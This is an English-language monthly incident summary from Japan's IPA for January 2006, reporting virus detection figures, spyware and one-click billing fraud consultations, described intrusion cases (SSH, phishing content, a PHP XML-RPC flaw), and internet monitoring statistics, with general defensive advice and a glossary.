| This is a summary of
computer virus/unauthorized computer access incident reports for
January, 2006 compiled by IPA.
Reminder
for the Month: “ Malicious
Codes may be Installed if Ignores Alert!! ”
-
Don't you Neglect an Alert,
do you?
-
Current tendency mostly can
be seen is frequent consultations about such damages: malicious
codes were installed automatically and/or infected by virus upon
opening attachment files to e-mails by clicking links and/or images
written on blogs/e-bulletin board while browsing home pages. In
addition, even installed anti-virus software or software for personal
firewalls, such damages caused by virus infection, information leakage,
etc. are being happened almost open-ended.
There was an instance about
“One-click billing fraud”, listed as the top of consultations to
IPA; the outcome obtained from the instance analyzed, it is realized
that a certain “alert” is displayed on the process that a damage
is generated. That is, it is assumed that a user is faced damage
because he/she may be neglect the “alert”.
<The Alert when
Virus or Spyware is Embedded>
Please be cautious if following
alert is displayed when you try to open files thinking that the
file is for image or for animated image. The “Security Alert” is
the message from OS (Windows XP) to protect its system. If you feel
suspicious, be sure to check the information for file
“ type ” and the “ source ” of
the file and do not click “ execution
” or “ execute ” unless enough
security is ensured .
|
<Alert
relevant to
Unauthorized
Access>
Please
be cautious if such alert in the right hand side is displayed
under the situation where you are not in communication. This
alert is the message from personal firewall software. It is
likely that certain virus or spyware already invaded attempt
to leak information outside. If such inquiry screen is displayed,
you are to check the name of program or file name and do not
click “Allowing Connection” unless enough security is ensured. |
|
<Reference>
IPA – “How to Respond if
Bill is Charged Simply Clicked Sites” (in Japanese)
http://www.ipa.go.jp/security/ciadr/oneclick.html
IPA – “7 Items of Anti-Virus
Measures for PC Users” (in Japanese)
http://www.ipa.go.jp/security/antivirus/7kajonew.html
IPA – “5 Items of Anti-Spyware
Measures for PC Users” (in Japanese)
http://www.ipa.go.jp/security/antivirus/spyware5kajyou.html
I.
Reporting Status for Computer Virus
– Please refer to Attachment 1 for further details –
The detection number [1]
of virus was about 4.13M : about 70% decreased
from 13.44M counted in December.
This was caused by W32/Sober's specific variant
which increased entire detection number of virus by sending massive
virus mails in December. Since the variant stopped
its mail sending activities , the entire detection number
was drastically decreased. (The detection number of W32/Sober in
December was 10.75M and about 85% of decrease with 1.63M in January.)
In addition, the reported number [2]
in January was 4,499 : 4.8% increased from
4,293 in December.
| [1]Detection
number: |
Reported
virus counts (cumulative) found by a filer. For January, the
reported number resulted in 4,499 upon aggregation of virus
detection counts reported about 4.13M. |
[2]Reported
number: |
Virus counts are
aggregated: viruses of same type and variants reported on
the same day are counted as one case number regardless how
many viruses or the actual number of viruses are found by
the same filer on the same day. In January, reported number
was 4,499: aggregated virus detection number of about 4.13M.
|
The worst detection number
was for W32/Netsky with about 2.04M, and W32/Sober with
about 1.63M and W32/Mytob with about 0.29M were subsequently followed
.
(Note: Numbers in parenthesis
are the figures for the previous month)
II.
About Spyware
spyware (*1)
is automatically installed simply clicked to an image of an adult
site and user's mailing address is stolen – such consultation is
increased from last year. In the event that the mailing address
was stolen, such damage that suspicious billing statement through
by e-mails is being generated. Be sure not to encounter damage to
conduct following countermeasures and be cautious do not download
suspicious files easily.
1. Utilize
anti-spyware software to update definition files and check with
or without of spyware.
2. Retain
your computer always up-to-dated by applying modification
programs frequently.
3. Be cautious
with suspicious sites and/or questionable mails.
4. Enhance
your computer's security.
5. Back
up necessary files for further security.
Brochure for Anti-Spyware
Measures (in Japanese)
http://www.ipa.go.jp/security/antivirus/shiori.html
III.
Reporting Status for Unauthorized Computer Access (includes
consultation) – Please refer Attachment 2 for further details –
Report for unauthorized computer
access and Accepting Status of consultation
|
Aug.
|
Sep.
|
Oct.
|
Nov.
|
Dec.
|
Jan.
‘06 |
Total
for Reported (a) |
41
|
31
|
22
|
24
|
25
|
50
|
| |
Damaged
(b) |
12
|
16
|
15
|
15
|
19
|
13
|
Not
Damaged (c) |
29
|
15
|
7
|
9
|
6
|
37
|
Total
for Consultation (d) |
43
|
30
|
35
|
30
|
25
|
43
|
| |
Damaged
(e) |
23
|
16
|
25
|
18
|
15
|
23
|
Not
Damaged (f) |
20
|
14
|
10
|
12
|
10
|
20
|
Grand
Total (a + d) |
84
|
61
|
57
|
54
|
50
|
93
|
| |
Damaged
(b + e) |
35
|
32
|
40
|
33
|
34
|
36
|
Not
Damaged (c + f) |
49
|
29
|
17
|
21
|
16
|
57
|
1. Reporting Status of
Unauthorized Computer Access
The reported number
for January was 50 : of 13
was the number actually damaged .
2. Accepting Status of
Consultations for Unauthorized Computer Access, etc.
Consultation counts relevant
to unauthorized computer access was 43: of 23 (of 6 was also counted
as reported number) was the actual number that some sort of damage
was reported.
3. Status for Damage
Breakdown of
the damage report included: intrusion with 11
and others (damaged) with 2 . The reports
relevant to intrusion after attacked to the ports
(*2) used
by SSH (*3) was
reported 3 cases, intruded into Web server and Web contents were
automatically set which would be exploited by phishing was reported
2 cases and vulnerability in PHP
(*4)
implemented library for XML-RPC
(*5)
was attacked and intruded was reported 2 cases.
Damage
Instances:
<Intrusion>
(i) Attacks to the
port used for SSH
<Instance>
- Network
monitoring device detected frequent SSH access attempts from internal
server to the servers outside.
- It is realized
that the server attempted unauthorized SSH connection to the
servers outside when confirmed its logs (*6)
(the server was exploited as
steppingstone to conduct site attack outside.).
- The testing
account (*7)
that has not been used was remained. Since the
password for the account was vulnerable, it was attacked and intruded.
(ii) Setting up
of contents used for phishing fraud and leakage of private
information
<Instance>
- When accessing
to the Web site of own organization, confirmed that a forged
site that masquerades to be a famous shopping site was displayed
(so reported
from outside).
- The contents
for the fake page (it can be considered that the page was exploited
for phishing fraud) were located on our Web server. In addition,
its password was
automatically changed so that the server administrator could not
be logged into
the server.
- Neither firewall
had been set nor the software had been updated may be the
cause.
- Since the server
intruded maintained private information, the information may be
leaked outside.
(iii) Intrusion
exploited vulnerability in XML-RPC
<Instance>
- Intruded
in a Web server and its home page was altered (so reported
from outside).
- “Vulnerability
in XML-RPC” in the PHP library incorporated in the Web server
being exploited was the cause.
- The troubled
library had not been in use.
VI.
Accepting Status of Consultation
The number of consultations
in January was 748. Of 173
was the consultation so called “One-click billing fraud” such as
receiving “billing fraud” mails after browsing an adult site were
unchangeably many. In addition, nearly 90% of
the consultation relevant to one-click billing fraud
was for the cases that some malicious codes such as spyware, etc.
were embedded. <movement in one-click billing fraud… July: 28,
August: 83, September: 80, October: 108, November: 165 and December:
138>
Movement in entire number of consultation accepted by IPA
|
Aug.
|
Sep.
|
Oct.
|
Nov.
|
Dec.
|
Jan.
‘06 |
Total
|
629
|
554
|
606
|
673
|
653
|
748
|
| |
Automatic
Response System |
376
|
337
|
357
|
379
|
391
|
425
|
Telephone
|
179
|
144
|
165
|
220
|
194
|
228
|
e-mail
|
67
|
72
|
82
|
66
|
66
|
87
|
Fax,
Others |
7
|
1
|
2
|
8
|
2
|
8
|
*IPA consults/advises
for computer viruses/unauthorized computer accesses as well as the
other information concerning overall security issues
Mail: 
for virus issues,  for
crack issues.
Tel.: +81-3-5978-7509
(24-hour automatic response)
Fax: +81-3-5978-7518
(24-hour automatic response)
*The Total case number
includes the number in Consultation (d) column of the Chart in the
“III. Status for Reported Unauthorized Computer Access”.
*”Automatic Response System”:
Accepted numbers by automatic response
*“Telephone”:
Accepted
numbers by the Security Center personnel
The instances for the main consultations were as follows:
(i)
What if an Award was Won so Informed by e-mail…?
Consultation:
Received an e-mail saying
“You won \1,000,000” without any of warning. The system was that
if I send a blank e-mail then I will be remitted \1,000,000 if I
send back an e-mail again by filling out necessary information to
the designated addressee. I have, therefore, sent back the e-mail
including my banking account: \1,000,000 has not yet been remitted,
but the same winning mail still arrives almost everyday.
Response:
This may be a simple winning
mail for fake prize and is may be a phishing fraud to exploit
user's name, banking account, etc . Do not believe suspicious
mail which you do not know easily and you are to always
doubt that “this may be a trap” . Particularly be cautious
if you have to input your private information.
(ii) What if Private
Information was Leaked because of Virus Infection…?
Consultation:
Infected by virus while
using Winny. Private information was leaked such as my name and
address, etc. by virus. What should I do?
Response:
Actually, it is
impossible to collect such data deviated to file exchange network
. When you use file exchange network, be sure to recognize
such risky status and to conduct thorough security measures
such as implementing anti-virus software, etc .
<Reference>
IPA – “Dos and Don'ts when
using file exchange software” (in Japanese)
http://www.ipa.go.jp/security/topics/20050623_exchange.html
In addition, please also
refer to the following site for additional information in relation
to one-click billing fraud which still constitutes large number
of consultation.
IPA – “Countermeasures in
case billed when you simply clicked” (in Japanese)
http://www.ipa.go.jp/security/ciadr/oneclick.html
V.
Accessing Status Captured by the Internet Monitoring (TALOT2”) in
January
In the Internet Monitoring
(TALOT2), unwanted (one-sided) access in January totaled 415,438
cases using 10 monitoring points: unwanted (one-sided) access captured
at one monitoring point was about 1,340 cases of
accesses from about 357 sources per day.
The environment for each
monitoring point in TALOT2 is nearly equal to general users' Internet
connection; it can be considered that the same amount of unwanted
(one-sided) access may be received by the general internet users.
In another words, your computer is being accessed by 4 cases
of access which are considered to be unauthorized from 357 unknown
people (source) everyday in average .
Chart
5.1: Unwanted (One-sided) Number of Access and Source Number of
Access/Monitoring Point/Day
Chart 5.1 shows the
number of access and the source number of access in average/monitoring
point/day from June, 2004 to January, 2006. The chart indicates
that unwanted (one-sided) access including source number of access
tend to decrease moderately.
Accessing status
in January shows that there are number of unauthorized computer
access which may target vulnerability in Windows unchangeably
many. Accessing to the ports 135 (TCP) and 445 (TCP) that have
exclusively large number of access target vulnerability in Windows.
In addition, there are number of pop-up message which prompt anti-virus
measures and/or unauthorized computer access measures and pop-up
ads by add-ware while net surfing, you are to be cautious not
to be fooled by these contents easily.
Please refer to the following
sites for the details in relation to the above mentioned information.
(in Japanese)
“Attachment 3_Accessing
Status Captured by the Internet Monitoring (TALOT2)”
http://www.ipa.go.jp/security/txt/2006/documents/TALOT2-0602.pdf
“Various
Statistics Information Provided by Other Organizations/Vendors
are Publicized in the Following Sites”
“Interpretation
for Glossaries”
(*1)
Spyware:
One of software which
acquires information by fraud such as user's individual information,
access archives, etc. to sends them out automatically to third
person, third party, etc.
(*2)
Port:
A window interfaces each
service within a computer used for exchanging information with
outsides. Numbers from 0 to 65535 are used for the ports so that
they are also called Port Number.
(*3)
SSH(Secure
Shell):
A protocol or a program
used for log-in to another computer via the network, execute commands
by a computer in remote and transfer files to another computer.
Since data via thenetwork is encrypted, a series of operations
through the Internet can be done safely.
(*4)
XML-RPC (eXtensible Markup Language – Remote Procedure
Call) :
A protocol executes
RPC on the Internet using XML. RPC is the procedure to process
programs utilizing computer which connected to network.
(*5)
PHP (PHP: Hypertext Preprocessor) :
A universal script language
suits to dynamic Web page generation. PHP can be embedded in the
HTML description.
(*6)
log:
Record of the use of
a computer or data communication. Generally, operator's ID, time
and date for the operation, contents of operation, etc. are recorded.
(*7)
Account:
The privilege which
allow a user to use resources on a computer or the network; it
also implies the ID necessary upon use.
- Attachment
3 Observation Status by Internet Monitoring System (TALOT2)
|
Japanese